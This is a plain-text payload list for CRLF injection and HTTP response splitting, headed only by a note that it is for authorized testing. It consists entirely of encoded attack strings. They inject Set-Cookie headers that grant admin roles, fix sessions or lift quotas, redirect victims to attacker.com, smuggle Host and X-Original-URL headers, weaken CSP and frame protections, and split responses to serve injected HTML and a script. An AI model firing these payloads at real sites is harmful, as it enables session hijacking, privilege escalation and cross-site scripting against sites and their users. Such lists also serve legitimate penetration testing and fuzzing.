# CRLF injection payloads — PAT CRLF Injection + HTTP response splitting
# Authorized testing only.

%0d%0aSet-Cookie:admin=true
%0d%0aSet-Cookie:%20admin=true
%0d%0aLocation:%20http://attacker.com
%0d%0aX-Injected:%20true
%0ASet-Cookie:%20admin=true
%0D%0ASet-Cookie:%20admin=true
%0dSet-Cookie:%20admin=true
%0aSet-Cookie:%20admin=true
%250d%250aSet-Cookie:%20admin=1
%25250d%25250aSet-Cookie:%20admin=1
%0d%0aRefresh:%200;url=http://attacker.com
%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert(1)</script>
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2039%0d%0a%0d%0a<html>Injected</html>
%0d%0aTransfer-Encoding:%20chunked
%0d%0aAccess-Control-Allow-Origin:%20*
%0d%0aX-Forwarded-For:%20127.0.0.1
%0d%0aX-Original-URL:%20/admin
%0d%0aX-Rewrite-URL:%20/admin
%0d%0aHost:%20attacker.com
%0d%0aSet-Cookie:%20role=admin
%0d%0aSet-Cookie:%20isAdmin=1
%0d%0aSet-Cookie:%20session=ATTACKER;%20Path=/
%0d%0aLocation:%20//attacker.com
%0d%0aLocation:%20/%0d%0aSet-Cookie:%20admin=1
%0d%0aContent-Security-Policy:%20default-src%20*
%0d%0aX-Frame-Options:%20ALLOWALL
%0d%0aSet-Cookie%3a%20admin=1
%0d%0a%20Set-Cookie:%20admin=1
%0d%0a%09Set-Cookie:%20admin=1
%0d%0aSet-Cookie:%20a=b;%20Domain=target.com;%20Path=/;%20Secure;%20HttpOnly
%0d%0aSet-Cookie:%20logged_in=1;%20Max-Age=9999999
%0d%0aSet-Cookie:%20user=admin;%20SameSite=None;%20Secure
%0d%0aSet-Cookie:%20debug=1
%0d%0aSet-Cookie:%20account_type=admin
%0d%0aSet-Cookie:%20permissions=all
%0d%0aSet-Cookie:%20token=admin
%0d%0aSet-Cookie:%20access_token=admin
%0d%0aSet-Cookie:%20bypass=1
%0d%0aSet-Cookie:%20feature_flags=all
%0d%0aSet-Cookie:%20config=admin
%0d%0aSet-Cookie:%20user_id=1
%0d%0aSet-Cookie:%20env=production
%0d%0aSet-Cookie:%20tier=enterprise
%0d%0aSet-Cookie:%20plan=enterprise
%0d%0aSet-Cookie:%20subscription=active
%0d%0aSet-Cookie:%20quota=999999
%0d%0aSet-Cookie:%20rate_limit=0
%0d%0aSet-Cookie:%20enable=1
%0d%0aSet-Cookie:%20activate=1
